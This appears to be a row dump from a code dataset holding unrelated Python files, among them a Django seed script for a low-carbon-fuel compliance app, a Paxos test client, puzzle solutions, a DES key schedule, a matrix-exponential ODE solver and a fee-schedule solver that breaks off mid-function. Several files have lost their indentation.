                  'tfrsadmin',
                  'admin']
    # Fuel-supplier organizations created by run().
    _orgs = ['Fuel Supplier 1', 'Fuel Supplier 2', 'Fuel Supplier 3']
def check_run_preconditions(self):
    """Return False (blocking the script) if any seed user or organization
    already exists; True when the database is clean."""
    for username in self._usernames:
        if User.objects.filter(username=username).exists():
            print('Found an existing user {}'.format(username))
            return False
    for org in self._orgs:
        if Organization.objects.filter(name=org).exists():
            # BUG FIX: the original printed `username` (the last user checked
            # in the loop above) instead of the offending organization name.
            print('Found an existing organization {}'.format(org))
            return False
    return True
@transaction.atomic
def run(self):
try:
CompliancePeriod.objects.get(description='Auto-generated initial compliance period').delete()
display_order = 10
compliance_periods = []
for period in range(2013, 2031):
display_order += 1
compliance_periods.append(
CompliancePeriod(
description=period,
display_order=display_order,
effective_date="{}-01-01".format(period),
expiration_date="{}-12-31".format(period)
)
)
CompliancePeriod.objects.bulk_create(compliance_periods)
Organization(name=self._orgs[0],
actions_type=OrganizationActionsType.objects.get_by_natural_key("Buy And Sell"),
type=OrganizationType.objects.get_by_natural_key("Part3FuelSupplier"),
status=OrganizationStatus.objects.get_by_natural_key('Active'), id=2).save()
Organization(name=self._orgs[1],
actions_type=OrganizationActionsType.objects.get_by_natural_key("Buy And Sell"),
type=OrganizationType.objects.get_by_natural_key("Part3FuelSupplier"),
status=OrganizationStatus.objects.get_by_natural_key('Active'), id=3).save()
Organization(name=self._orgs[2],
actions_type=OrganizationActionsType.objects.get_by_natural_key("Buy And Sell"),
type=OrganizationType.objects.get_by_natural_key("Part3FuelSupplier"),
status=OrganizationStatus.objects.get_by_natural_key('Active'), id=4).save()
OrganizationBalance(organization=Organization.objects.get_by_natural_key(self._orgs[0]), credit_trade=None,
validated_credits=1000, effective_date=datetime.today().strftime('%Y-%m-%d')).save()
OrganizationBalance(organization=Organization.objects.get_by_natural_key(self._orgs[1]), credit_trade=None,
validated_credits=1000, effective_date=datetime.today().strftime('%Y-%m-%d')).save()
OrganizationBalance(organization=Organization.objects.get_by_natural_key(self._orgs[2]), credit_trade=None,
validated_credits=1000, effective_date=datetime.today().strftime('%Y-%m-%d')).save()
User(email='fs1@email.com', username='fs1',
first_name='FS1', last_name='Supplier', display_name='Fuel Supplier',
organization=Organization.objects.get_by_natural_key(self._orgs[0])).save()
User(email='fs2@email.com', username='fs2',
first_name='FS2', last_name='Supplier', display_name='Another Fuel Supplier',
organization=Organization.objects.get_by_natural_key(self._orgs[1])).save()
User(email='fs3@email.com', username='fs3',
first_name='FS3', last_name='Supplier', display_name='Third Fuel Supplier',
organization=Organization.objects.get_by_natural_key(self._orgs[2])).save()
User(email='analyst@email.com', username='analyst',
first_name='Analyst', last_name='Government', display_name='Analyst',
organization=Organization.objects.get(id=1)).save()
User(email='director@email.com', username='director',
first_name='Director', last_name='Government', display_name='(Director)',
organization=Organization.objects.get(id=1)).save()
User(email='tfrsadmin@email.com', username='tfrsadmin',
first_name='TfrsAdmin', last_name='Government', display_name='(TfrsAdmin)',
organization=Organization.objects.get(id=1)).save()
UserRole(user=User.objects.get(username='fs1'), role=Role.objects.get_by_natural_key('FSManager')).save()
UserRole(user=User.objects.get(username='fs1'), role=Role.objects.get_by_natural_key('ComplianceReporting')).save()
UserRole(user=User.objects.get(username='fs1'), role=Role.objects.get_by_natural_key('FSDocSubmit')).save()
UserRole(user=User.objects.get(username='fs2'), role=Role.objects.get_by_natural_key('FSManager')).save()
UserRole(user=User.objects.get(username='fs2'), role=Role.objects.get_by_natural_key('FSDocSubmit')).save()
UserRole(user=User.objects.get(username='fs3'), role=Role.objects.get_by_natural_key('FSManager')).save()
UserRole(user=User.objects.get(username='fs3'), role=Role.objects.get_by_natural_key('FSDocSubmit')).save()
UserRole(user=User.objects.get(username='fs3'), role=Role.objects.get_by_natural_key('FSAdmin')).save()
UserRole(user=User.objects.get(username='analyst'), role=Role.objects.get_by_natural_key('GovUser')).save()
UserRole(user=User.objects.get(username='analyst'), role=Role.objects.get_by_natural_key('GovDoc')).save()
UserRole(user=User.objects.get(username='director'), role=Role.objects.get_by_natural_key('GovDirector')).save()
UserRole(user=User.objects.get(username='tfrsadmin'), role=Role.objects.get_by_natural_key('Admin')).save()
# These are copied verbatim from operational scripts 0006 through 0012.
# They must be copied instead of run on startup since their precondition checks don't do anything
CarbonIntensityLimit.objects.create(
compliance_period=CompliancePeriod.objects.get(description="2017"),
effective_date="2017-01-01",
expiration_date="2017-12-31",
density="90.02",
fuel_class=FuelClass.objects.get(fuel_class="Diesel")
)
CarbonIntensityLimit.objects.create(
compliance_period=CompliancePeriod.objects.get(description="2017"),
effective_date="2017-01-01",
expiration_date="2017-12-31",
density="83.74",
fuel_class=FuelClass.objects.get(fuel_class="Gasoline")
)
# 2018
CarbonIntensityLimit.objects.create(
compliance_period=CompliancePeriod.objects.get(description="2018"),
effective_date="2018-01-01",
expiration_date="2018-12-31",
density="88.60",
fuel_class=FuelClass.objects.get(fuel_class="Diesel")
)
CarbonIntensityLimit.objects.create(
compliance_period=CompliancePeriod.objects.get(description="2018"),
effective_date="2018-01-01",
expiration_date="2018-12-31",
density="82.41",
fuel_class=FuelClass.objects.get(fuel_class="Gasoline")
)
# 2019
CarbonIntensityLimit.objects.create(
compliance_period=CompliancePeriod.objects.get(description="2019"),
effective_date="2019-01-01",
expiration_date="2019-12-31",
density="87.18",
fuel_class=FuelClass.objects.get(fuel_class="Diesel")
)
CarbonIntensityLimit.objects.create(
compliance_period=CompliancePeriod.objects.get(description="2019"),
effective_date="2019-01-01",
expiration_date="2019-12-31",
density="81.09",
fuel_class=FuelClass.objects.get(fuel_class="Gasoline")
)
carbon_intensities = []
for period in range(2020, 2031):
carbon_intensities.append(
CarbonIntensityLimit(
compliance_period=CompliancePeriod.objects.get(
description=period
),
effective_date="{}-01-01".format(period),
expiration_date="{}-12-31".format(period),
density="85.28",
fuel_class=FuelClass.objects.get(fuel_class="Diesel")
)
)
carbon_intensities.append(
CarbonIntensityLimit(
compliance_period=CompliancePeriod.objects.get(
description=period
),
effective_date="{}-01-01".format(period),
expiration_date="{}-12-31".format(period),
density="79.33",
fuel_class=FuelClass.objects.get(fuel_class="Gasoline")
)
)
CarbonIntensityLimit.objects.bulk_create(carbon_intensities)
EnergyEffectivenessRatio.objects.create(
category=EnergyEffectivenessRatioCategory.objects.get(
name="Petroleum-based diesel fuel or renewable fuel in "
"relation to diesel class fuel"
),
effective_date="2017-01-01",
ratio="1.0",
fuel_class=FuelClass.objects.get(fuel_class="Diesel")
)
EnergyEffectivenessRatio.objects.create(
category=EnergyEffectivenessRatioCategory.objects.get(
name="Petroleum-based gasoline, natural gas-based gasoline or "
"renewable fuel in relation to gasoline class fuel"
),
effective_date="2017-01-01",
ratio="1.0",
fuel_class=FuelClass.objects.get(fuel_class="Gasoline")
)
EnergyEffectivenessRatio.objects.create(
category=EnergyEffectivenessRatioCategory.objects.get(
name="Hydrogen"
),
effective_date="2017-01-01",
ratio="1.9",
fuel_class=FuelClass.objects.get(fuel_class="Diesel")
)
EnergyEffectivenessRatio.objects.create(
category=EnergyEffectivenessRatioCategory.objects.get(
name="Hydrogen"
),
effective_date="2017-01-01",
ratio="2.5",
fuel_class=FuelClass.objects.get(fuel_class="Gasoline")
)
EnergyEffectivenessRatio.objects.create(
category=EnergyEffectivenessRatioCategory.objects.get(
name="LNG"
),
effective_date="2017-01-01",
ratio="1.0",
fuel_class=FuelClass.objects.get(fuel_class="Diesel")
)
EnergyEffectivenessRatio.objects.create(
category=EnergyEffectivenessRatioCategory.objects.get(
name="CNG"
),
effective_date="2017-01-01",
ratio="0.9",
fuel_class=FuelClass.objects.get(fuel_class="Diesel")
)
EnergyEffectivenessRatio.objects.create(
category=EnergyEffectivenessRatioCategory.objects.get(
name="CNG"
),
effective_date="2017-01-01",
ratio="1.0",
fuel_class=FuelClass.objects.get(fuel_class="Gasoline")
)
EnergyEffectivenessRatio.objects.create(
category=EnergyEffectivenessRatioCategory.objects.get(
name="Propane"
),
effective_date="2017-01-01",
ratio="1.0",
fuel_class=FuelClass.objects.get(fuel_class="Diesel")
)
EnergyEffectivenessRatio.objects.create(
category=EnergyEffectivenessRatioCategory.objects.get(
name="Propane"
),
effective_date="2017-01-01",
ratio="1.0",
fuel_class=FuelClass.objects.get(fuel_class="Gasoline")
)
EnergyEffectivenessRatio.objects.create(
category=EnergyEffectivenessRatioCategory.objects.get(
name="Electricity"
),
effective_date="2017-01-01",
ratio="2.7",
fuel_class=FuelClass.objects.get(fuel_class="Diesel")
)
EnergyEffectivenessRatio.objects.create(
category=EnergyEffectivenessRatioCategory.objects.get(
name="Electricity"
),
effective_date="2017-01-01",
ratio="3.4",
fuel_class=FuelClass.objects.get(fuel_class="Gasoline")
)
DefaultCarbonIntensity.objects.create(
category=DefaultCarbonIntensityCategory.objects.get(
name__iexact="Renewable Fuel in relation to diesel class fuel"
),
effective_date="2017-01-01",
density="98.96"
)
DefaultCarbonIntensity.objects.create(
category=DefaultCarbonIntensityCategory.objects.get(
name__iexact="Propane"
),
effective_date="2017-01-01",
density="75.35"
)
DefaultCarbonIntensity.objects.create(
category=DefaultCarbonIntensityCategory.objects.get(
name__iexact="Renewable Fuel in relation to gasoline class fuel"
),
effective_date="2017-01-01",
density="88.14"
)
DefaultCarbonIntensity.objects.create(
category=DefaultCarbonIntensityCategory.objects.get(
name__iexact="Natural gas-based gasoline"
),
effective_date="2017-01-01",
density="90.07"
)
DefaultCarbonIntensity.objects.create(
category=DefaultCarbonIntensityCategory.objects.get(
name__iexact="LNG"
),
effective_date="2017-01-01",
density="112.65"
)
DefaultCarbonIntensity.objects.create(
category=DefaultCarbonIntensityCategory.objects.get(
name__iexact="CNG"
),
effective_date="2017-01-01",
density="63.64"
)
DefaultCarbonIntensity.objects.create(
category=DefaultCarbonIntensityCategory.objects.get(
name__iexact="Electricity"
),
effective_date="2017-01-01",
density="19.73"
)
DefaultCarbonIntensity.objects.create(
category=DefaultCarbonIntensityCategory.objects.get(
name__iexact="Hydrogen"
),
effective_date="2017-01-01",
density="96.82"
)
EnergyDensity.objects.create(
category=EnergyDensityCategory.objects.get(
name="Petroleum-based diesel fuel or diesel fuel produced "
"from biomass"
),
effective_date="2017-01-01",
density="38.65"
)
EnergyDensity.objects.create(
category=EnergyDensityCategory.objects.get(
name="Hydrogenation-derived renewable diesel fuel"
),
effective_date="2017-01-01",
density="36.51"
)
EnergyDensity.objects.create(
category=EnergyDensityCategory.objects.get(
name="Biodiesel"
),
effective_date="2017-01-01",
density="35.40"
)
EnergyDensity.objects.create(
category=EnergyDensityCategory.objects.get(
name="Petroleum-based gasoline, natural gas-based "
"gasoline or gasoline produced from biomass"
),
effective_date="2017-01-01",
density="34.69"
)
EnergyDensity.objects.create(
category=EnergyDensityCategory.objects.get(
name="Ethanol"
),
effective_date="2017-01-01",
density="23.58"
)
EnergyDensity.objects.create(
category=EnergyDensityCategory.objects.get(
name="Hydrogen"
),
effective_date="2017-01-01",
density="141.24"
)
EnergyDensity.objects.create(
category=EnergyDensityCategory.objects.get(
name="LNG"
),
effective_date="2017-01-01",
density="52.46"
)
EnergyDensity.objects.create(
category=EnergyDensityCategory.objects.get(
name="CNG"
),
effective_date="2017-01-01",
density="37.85"
)
EnergyDensity.objects.create(
category=EnergyDensityCategory.objects.get(
name="Propane"
),
effective_date="2017-01-01",
density="25.47"
)
EnergyDensity.objects.create(
category=EnergyDensityCategory.objects.get(
name="Electricity"
),
effective_date="2017-01-01",
density="3.60"
)
CarbonIntensityLimit.objects.update(
effective_date="2017-01-01",
expiration_date=None
)
PetroleumCarbonIntensity.objects.create(
category=PetroleumCarbonIntensityCategory.objects.get(
name="Petroleum-based diesel"
),
effective_date="2017-01-01",
density="94.76"
)
PetroleumCarbonIntensity.objects.create(
category=PetroleumCarbonIntensityCategory.objects.get(
name="Petroleum-based gasoline"
),
effective_date="2017-01-01",
density="88.14"
)
ExpectedUse.objects.create(
description="Other",
display_order="99",
effective_date="2017-01-01"
)
ExpectedUse.objects.create(
description="Heating Oil",
display_order="1",
effective_date="2017-01-01"
)
ExpectedUse.objects.create(
description="Department of National Defence (Canada)",
display_order="2",
effective_date="2017-01-01"
)
ExpectedUse.objects.create(
description="Aviation",
display_order="3",
effective_date="2017-01-01"
)
NotionalTransferType.objects.create(
the_type="Received",
display_order="1",
effective_date="2017-01-01"
)
NotionalTransferType.objects.create(
the_type="Transferred",
display_order="2",
effective_date="2017-01-01"
)
prescribed_carbon_intensity = \
CarbonIntensityDeterminationType.objects.create(
display_order="1",
effective_date="2017-01-01",
the_type="Carbon Intensity"
)
provision = ProvisionOfTheAct.objects.create(
description="Prescribed carbon intensity",
display_order="1",
effective_date="2017-01-01",
expiration_date=None,
provision="Section 6 (5) (a)"
)
ApprovedFuelProvision.objects.create(
fuel=ApprovedFuel.objects.get(name="Petroleum-based gasoline"),
provision_act=provision,
determination_type=prescribed_carbon_intensity
)
provision = ProvisionOfTheAct.objects.create(
description="Prescribed carbon intensity",
display_order="2",
effective_date="2017-01-01",
expiration_date=None,
provision="Section 6 (5) (b)"
)
ApprovedFuelProvision.objects.create(
fuel=ApprovedFuel.objects.get(name="Petroleum-based diesel"),
provision_act=provision,
determination_type=prescribed_carbon_intensity
)
# other fuel types
approved_fuel_code = \
CarbonIntensityDeterminationType.objects.create(
display_order="2",
effective_date="2017-01-01",
the_type="Fuel Code"
)
fuel_types = ApprovedFuel.objects.exclude(
name__in=["Petroleum-based diesel", "Petroleum-based gasoline"]
)
# Section 6 (5) (c)
provision = ProvisionOfTheAct.objects.create(
description="Approved fuel code",
display_order="3",
effective_date="2017-01-01",
expiration_date=None,
provision="Section 6 (5) (c)"
)
obj = [
ApprovedFuelProvision(
fuel=fuel_type,
provision_act=provision,
determination_type=approved_fuel_code
) for fuel_type in fuel_types
]
ApprovedFuelProvision.objects.bulk_create(obj)
# Section 6 (5) (d) (i)
default_carbon_intensity = \
CarbonIntensityDeterminationType.objects.create(
display_order="3",
effective_date="2017-01-01",
the_type="Default Carbon Intensity"
)
provision = ProvisionOfTheAct.objects.create(
description="Default Carbon Intensity Value",
display_order="4",
effective_date="2017-01-01",
expiration_date=None,
provision="Section 6 (5) (d) (i)"
)
obj = [
ApprovedFuelProvision(
fuel=fuel_type,
provision_act=provision,
determination_type=default_carbon_intensity
) for fuel_type in fuel_types
]
ApprovedFuelProvision.objects.bulk_create(obj)
# Section 6 (5) (d) (ii) (A)
gh_genius = \
CarbonIntensityDeterminationType.objects.create(
display_order="4",
effective_date="2017-01-01",
the_type="GHGenius"
)
provision = ProvisionOfTheAct.objects.create(
description="GHGenius modelled",
display_order="5",
effective_date="2017-01-01",
expiration_date=None,
provision="Section 6 (5) (d) (ii) (A)"
)
obj = [
ApprovedFuelProvision(
fuel=fuel_type,
provision_act=provision,
determination_type=gh_genius
) for fuel_type in fuel_types
]
ApprovedFuelProvision.objects.bulk_create(obj)
# Section 6 (5) (d) (ii) (B)
alternative_method = \
CarbonIntensityDeterminationType.objects.create(
display_order="5",
effective_date="2017-01-01",
the_type="Alternative"
)
provision = ProvisionOfTheAct.objects.create(
description="Alternative Method",
display_order="6",
effective_date="2017-01-01",
expiration_date=None,
provision="Section 6 (5) (d) (ii) (B)"
)
obj = [
ApprovedFuelProvision(
fuel=fuel_type,
provision_act=provision,
determination_type=alternative_method
) for fuel_type in fuel_types
]
ApprovedFuelProvision.objects.bulk_create(obj)
TransactionType.objects.create(
the_type="Purchased",
display_order="1",
effective_date="2017-01-01"
)
TransactionType.objects.create(
the_type="Sold",
display_order="2",
effective_date="2017-01-01"
)
SigningAuthorityAssertion.objects.create(
description="I expect, on reasonable grounds, that any fuels "
"reported in Schedule C were used for a purpose other "
"than transport in accordance with section 6 (3) of "
"the *Greenhouse Gas Reduction (Renewable and Low "
"Carbon Fuel Requirements) Act*.",
display_order="1",
effective_date="2018-01-01",
module="compliance_report"
)
SigningAuthorityAssertion.objects.create(
description="I certify that records evidencing each matter "
"reported under sections 9 and 11.08 of the Renewable "
"and Low Carbon Fuel Requirements Regulation are "
"available on request.",
display_order="2",
effective_date="2018-01-01",
module="compliance_report"
)
SigningAuthorityAssertion.objects.create(
description="I certify that I am an officer or employee of the "
"fuel supplier, and that records evidencing my "
"authority to submit this report are available on "
"request.",
display_order="3",
effective_date="2018-01-01",
module="compliance_report"
)
SigningAuthorityAssertion.objects.create(
description="I certify that the information in this report is "
"true and complete to the best of my knowledge and I "
"understand that I may be required to provide to the "
"Director records evidencing the truth of that "
"information.",
display_order="4",
effective_date="2018-01-01",
module="compliance_report"
)
SigningAuthorityAssertion.objects.create(
description="I certify that records evidencing each matter "
"reported under section 11.032 (4) (b) or (c) of the "
"Renewable and Low Carbon Fuel Requirements "
"Regulation are available on request.",
display_order="1",
effective_date="2018-01-01",
module="exclusion_report"
)
SigningAuthorityAssertion.objects.create(
description="I certify that records evidencing my authority to "
"submit this report are available on request.",
display_order="2",
effective_date="2018-01-01",
module="exclusion_report"
)
SigningAuthorityAssertion.objects.create(
description="I certify that the information in this report is "
"true and complete to the best of my knowledge and I "
"understand that I may be required to provide to the "
"Director records evidencing the truth of that "
"information.",
display_order="3",
effective_date="2018-01-01",
module="exclusion_report"
)
except Exception as exc:
print(exc)
script_class = DockerEnvironment
|
999,433 | b7cb3e868a9fea5daa3ea58d4c55601c7cab0d81 | import requests
servers = ['https://paxos-1.herokuapp.com',
'https://paxos-2.herokuapp.com',
'https://paxos-3.herokuapp.com',
'https://paxos-4.herokuapp.com',
'https://paxos-5.herokuapp.com']
def check_values(key):
    """Ask every replica's listener endpoint for *key* and print each HTTP status."""
    print('Checking values...')
    for base_url in servers:
        response = requests.get(base_url + '/listener/' + key)
        print(base_url, response.status_code)
def make_propose(key, value):
    """Send one Paxos propose request for (key, value) to the last server and report the result."""
    target = servers[4]
    payload = {"key": key, "value": value}
    response = requests.post(target + '/proposer/propose', json=payload)
    print(target, response.status_code, 'value:', value, 'succeeded:', response.text)
# Smoke test: propose a single value, then ask every replica what it learned.
print('Sending one propose message')
key = 'test'
value = '1'
make_propose(key, value)
check_values(key)
|
999,434 | 347f94513e2d14bcb75f4fd817b45cb5b4606204 | # https://www.codewars.com/kata/take-a-picture/train/python
def sort_photos(pics):
    """Return the five most recent photos in chronological order, plus the
    next photo in the sequence (same year as the last, number + 1).

    Photo names look like ``"YYYY.imgN"``.
    """
    parsed = []
    for name in pics:
        year, _, tail = name.partition('.')
        parsed.append((year, int(tail[3:])))
    parsed.sort()
    recent = parsed[-5:]
    last_year, last_num = recent[-1]
    recent.append((last_year, last_num + 1))
    return ['{}.img{}'.format(year, num) for year, num in recent]
|
999,435 | 72998ff601e414c42815274b1a60c1e997cc0600 | import sys
from functools import reduce
# Advent of Code day 6: tally customs-declaration "yes" answers per group.
with open(sys.argv[1]) as answer_fle:
    # Groups are separated by blank lines in the input file.
    group_answers = answer_fle.read().split('\n\n')
total1 = 0  # part one: questions answered "yes" by ANYONE in the group
total2 = 0  # part two: questions answered "yes" by EVERYONE in the group
for group in group_answers:
    # One person's answers per line; filter drops empty strings from trailing newlines.
    all_answers = list(filter(None, group.split("\n")))
    # for part one
    total1 += len(set(''.join(all_answers)))
    # for part two: intersect every person's answer set
    intersection = reduce(lambda answer1, answer2: set.intersection(set(answer1), set(answer2)), all_answers)
    total2 += len(intersection)
print(f'Part one: {total1}')
print(f'Part two: {total2}')
|
999,436 | 24cf1f1c4ab020d7e5aa47e63f0e29d160149ccc | key = input()
s = 56
i=0
pbox =[57, 49, 41, 33, 25, 17, 9, 1, 58, 50, 42, 34, 26,
18, 10, 2, 59, 51, 43, 35, 27, 19, 11, 3, 60, 52,
44, 36, 63, 55, 47, 39, 31, 23, 15, 7, 62, 54, 46,
38, 30, 22, 14, 6, 61, 53, 45, 37, 29, 21, 13, 5,
28, 20, 12, 4 ]
n = 64
input_table = key
binary_input_table = bin(int(input_table, 16))[2:].zfill(n)
output = ""
for p in pbox:
output+=binary_input_table[p-1]
i = 0
to_be_shifted= output
this_key=""
rotations = [1, 1, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 1]
while(i<16):
left = to_be_shifted[:28]
right = to_be_shifted[28:]
#print(left+right)
"""if((rotations[i]) == 1):
print(to_be_shifted)
to_be_shifted = pep[1:] + pep[0]
print(to_be_shifted)
else:
print(to_be_shifted)
to_be_shifted = pep[2:] + pep[0] + pep[1]
print(to_be_shifted)"""
left = left[(rotations[i]):]+left[:(rotations[i])]
right = right[(rotations[i]):]+right[:(rotations[i])]
to_be_shifted = left + right
s = 48
pbox =[14, 17, 11, 24, 1, 5, 3, 28, 15, 6, 21, 10, 23,
19, 12, 4, 26, 8, 16, 7, 27, 20, 13, 2, 41, 52,
31, 37, 47, 55, 30, 40, 51, 45, 33, 48, 44, 49,
39, 56, 34, 53, 46, 42, 50, 36, 29, 32]
n = 56
binary_input_table = to_be_shifted
output = ""
for p in pbox:
output+=binary_input_table[p-1]
k = hex(int(output, 2))[2:].zfill(12)
k = k.upper()
print(k)
i+=1
|
999,437 | 33a663f400c3152109bf51618d6b46ef1680210e | import os
from distutils.core import setup
def find_stubs(package):
    """Map *package* to the list of file paths found under it, each made
    relative to the package root (for use as setuptools package_data)."""
    prefix = package + os.sep
    collected = []
    for dirpath, _dirnames, filenames in os.walk(package):
        for filename in filenames:
            relative = os.path.join(dirpath, filename).replace(prefix, '', 1)
            collected.append(relative)
    return {package: collected}
# Package metadata; the stub files are shipped as package data discovered
# at build time by find_stubs().
setup(
    name="django-stubs",
    url="https://github.com/mkurnikov/django-stubs.git",
    author="Maksim Kurnikov",
    author_email="maxim.kurnikov@gmail.com",
    version="0.1.0",
    license='BSD',
    install_requires='Django>=2.1.1',
    packages=['django-stubs'],
    package_data=find_stubs('django-stubs')
)
|
999,438 | 19b9e1ed608da44db1ea1a667a40131728ab4042 | # -*- coding: utf-8 -*-
from rest_framework import serializers
from .models import User
class UserSerializer(serializers.ModelSerializer):
    """Serializer for User that hides credential and permission fields.

    ``email`` is exposed read-only; ``password`` plus activity/permission
    flags are excluded from the API representation entirely.
    """

    class Meta:
        model = User
        exclude = ["password", "is_active", "is_staff", "is_superuser", "groups"]
        read_only_fields = ["email"]
|
999,439 | 46e33e6d5fd35a2acd642f74d72ee731e14b03d8 | # -*- coding: utf-8 -*-
from types import SimpleNamespace
import numpy as np
from pyyeti import expmint
class SolveExp1(object):
    """
    1st order ODE time domain solver based on the matrix exponential.

    This class is for solving: ``yd - A y = f``

    This solver is exact assuming either piece-wise linear or
    piece-wise constant forces. See :class:`SolveExp2` for more
    details on how this algorithm solves the ODE.

    Examples
    --------
    Calculate impulse response of state-space system::

        xd = A @ x + B @ u
        y = C @ x + D @ u

    where:

        - force = 0's
        - velocity(0) = B

    .. plot::
        :context: close-figs

        >>> from pyyeti import ode
        >>> from pyyeti.ssmodel import SSModel
        >>> import numpy as np
        >>> import matplotlib.pyplot as plt
        >>> f = 5  # 5 hz oscillator
        >>> w = 2*np.pi*f
        >>> w2 = w*w
        >>> zeta = .05
        >>> h = .01
        >>> nt = 500
        >>> A = np.array([[0, 1], [-w2, -2*w*zeta]])
        >>> B = np.array([[0], [3]])
        >>> C = np.array([[8, -5]])
        >>> D = np.array([[0]])
        >>> F = np.zeros((1, nt), float)
        >>> ts = ode.SolveExp1(A, h)
        >>> sol = ts.tsolve(B @ F, B[:, 0])
        >>> y = C @ sol.d
        >>> fig = plt.figure('Example')
        >>> fig.clf()
        >>> ax = plt.plot(sol.t, y.T,
        ...               label='SolveExp1')
        >>> ssmodel = SSModel(A, B, C, D)
        >>> z = ssmodel.c2d(h=h, method='zoh')
        >>> x = np.zeros((A.shape[1], nt+1), float)
        >>> y2 = np.zeros((C.shape[0], nt), float)
        >>> x[:, 0:1] = B
        >>> for k in range(nt):
        ...     x[:, k+1] = z.A @ x[:, k] + z.B @ F[:, k]
        ...     y2[:, k] = z.C @ x[:, k] + z.D @ F[:, k]
        >>> ax = plt.plot(sol.t, y2.T, label='discrete')
        >>> leg = plt.legend(loc='best')
        >>> np.allclose(y, y2)
        True

    Compare against scipy:

        >>> from scipy import signal
        >>> ss = ssmodel.getlti()
        >>> tout, yout = ss.impulse(T=sol.t)
        >>> ax = plt.plot(tout, yout, label='scipy')
        >>> leg = plt.legend(loc='best')
        >>> np.allclose(yout, y.ravel())
        True
    """

    def __init__(self, A, h, order=1):
        """
        Instantiates a :class:`SolveExp1` solver.

        Parameters
        ----------
        A : 2d ndarray
            The state-space matrix: ``yd - A y = f``
        h : scalar or None
            Time step or None; if None, the `E`, `P`, `Q` members will
            not be computed.
        order : scalar, optional
            Specify which solver to use:

            - 0 for the zero order hold (force stays constant across
              time step)
            - 1 for the 1st order hold (force can vary linearly across
              time step)

        Notes
        -----
        The class instance is populated with the following members:

        =======   =================================================
        Member    Description
        =======   =================================================
        A         the input `A`
        h         time step
        n         number of total DOF (``A.shape[0]``)
        order     order of solver (0 or 1; see above)
        E, P, Q   output of :func:`pyyeti.expmint.getEPQ`; they are
                  matrices used to solve the ODE
        pc        True if E, P, and Q members have been calculated;
                  False otherwise
        =======   =================================================

        The E, P, and Q entries are used to solve the ODE::

            for j in range(1, nt):
                d[:, j] = E*d[:, j-1] + P*F[:, j-1] + Q*F[:, j]
        """
        # Fix: `pc` was documented in the table above but never assigned;
        # set it so callers can check for E/P/Q without hasattr tricks.
        if h:
            E, P, Q = expmint.getEPQ(A, h, order)
            self.E = E
            self.P = P
            self.Q = Q
            self.pc = True
        else:
            self.pc = False
        self.A = A
        self.h = h
        self.order = order
        self.n = A.shape[0]

    def tsolve(self, force, d0=None):
        """
        Solve time-domain 1st order ODE equations.

        Parameters
        ----------
        force : 2d ndarray
            The force matrix; ndof x time
        d0 : 1d ndarray; optional
            Displacement initial conditions; if None, zero ic's are
            used.

        Returns
        -------
        A record (SimpleNamespace class) with the members:

        d : 2d ndarray
            Displacement; ndof x time
        v : 2d ndarray
            Velocity; ndof x time
        h : scalar
            Time-step
        t : 1d ndarray
            Time vector: np.arange(d.shape[1])*h

        Raises
        ------
        ValueError
            If `force` does not have ``self.n`` rows.
        RuntimeError
            If more than one time step is requested but the solver was
            instantiated with ``h=None``.
        """
        force = np.atleast_2d(force)
        if force.shape[0] != self.n:
            raise ValueError(
                f"Force matrix has {force.shape[0]} rows; {self.n} rows are expected"
            )
        nt = force.shape[1]
        d = np.zeros((self.n, nt))
        if d0 is not None:
            d[:, 0] = d0
        else:
            d0 = np.zeros(self.n, float)
        if nt > 1:
            if not self.h:
                raise RuntimeError("instantiate the class with a valid time step.")
            # calc force term outside loop:
            if self.order == 1:
                PQF = self.P @ force[:, :-1] + self.Q @ force[:, 1:]
            else:
                PQF = self.P @ force[:, :-1]
            E = self.E
            for j in range(1, nt):
                d0 = d[:, j] = E @ d0 + PQF[:, j - 1]
            t = self.h * np.arange(nt)
        else:
            t = np.array([0.0])
        # velocity directly from the ODE: v = f + A y
        return SimpleNamespace(d=d, v=force + self.A @ d, h=self.h, t=t)
|
999,440 | 54414d273853f30f4ca8f951b6c1e36ce9ca8250 | # pass the name of dataset you want to check for existence and bigquery client object
def exists(dataset_name, client):
    """Return "exists" if *dataset_name* is a dataset of *client*, else "doesn't exists".

    dataset_name : str
        Dataset id to look for.
    client : BigQuery client
        Any object whose ``list_datasets()`` yields items with a
        ``dataset_id`` attribute.

    Fix: the original collected ``dataset_id.encode('ascii', 'ignore')``
    into a list — under Python 3 that produces ``bytes`` which never
    compare equal to a ``str`` name, so the check always failed.
    Comparing the ids directly also avoids materializing the list and
    stops at the first match.
    """
    for dataset in client.list_datasets():
        if dataset.dataset_id == dataset_name:
            return "exists"
    return "doesn't exists"
|
999,441 | 3d73053b479c2efdabd39fb6fbb62d877389cd66 |
def solve():
    """Solve a two-band fee problem by hand and sanity-check the result."""
    print("magna")
    # converting the number into tsh (200,000 USD at 2290 Tsh/USD)
    profit_margin=200000*2290
    # percentage cut for profit, one rate per band
    p_cut1=0.005
    p_cut2=0.0025
    # expected transaction counts per band
    number_transaction1=812000
    number_transaction2=50000
    # revenue coefficient of each band (count * rate)
    sales_1=number_transaction1*p_cut1
    sales_2=number_transaction2*p_cut2
    # total capital split across the two bands
    tcap=3000000
    # solve sales_1*v1 + sales_2*v2 = profit_margin subject to v1 + v2 = tcap
    v2 =(profit_margin -((sales_1)*(tcap)))/(sales_2-sales_1)
    v1=tcap-v2
    print("v1: {} :Transactions: {} : Percentage: {} AmountCut {}".format(round(v1),number_transaction1, p_cut1,round(p_cut1*v1)))
    print(" v2 :{} :Transactions: {} : Percentage: {} AmountCut {}".format(round(v2),number_transaction2,p_cut2,round(p_cut2*v2)))
    # verify the algebra with the independent checker below
    if is_correct(v1,v2,tcap,sales_1,sales_2,profit_margin):
        print('okay')
    else:
        print('cha kike')
def is_correct(v1, v2, tcap, sales_1, sales_2, profit_margin):
    """Check that v1 + v2 matches the capital cap and that the rounded
    revenue (sales_1*v1 + sales_2*v2) matches the profit margin."""
    totals_match = tcap == v1 + v2
    revenue_match = profit_margin == round(sales_1 * v1 + sales_2 * v2)
    return totals_match and revenue_match
def sove_higher_orde_eq():
    """Solve an 11-band fee schedule as a linear system and print each band's cut.

    Bands are keyed by transaction-size name; the system couples the total
    profit row, chained band-to-band difference rows, and a pinned first value.
    """
    import numpy as np
    # Per-band percentage cut charged on a transaction.
    percentage_cut={"fivek":0.02,"tenk":0.01,"twentyk":0.005,"fourtyk":0.004,"fiftyk":0.005,"onehundredk":0.005,"twohundredk":0.005,"threehundredk":0.005,"fourhundredk":0.004,"fivehundredk":0.002,"onethousandk":0.001}
    # Expected number of transactions per band.
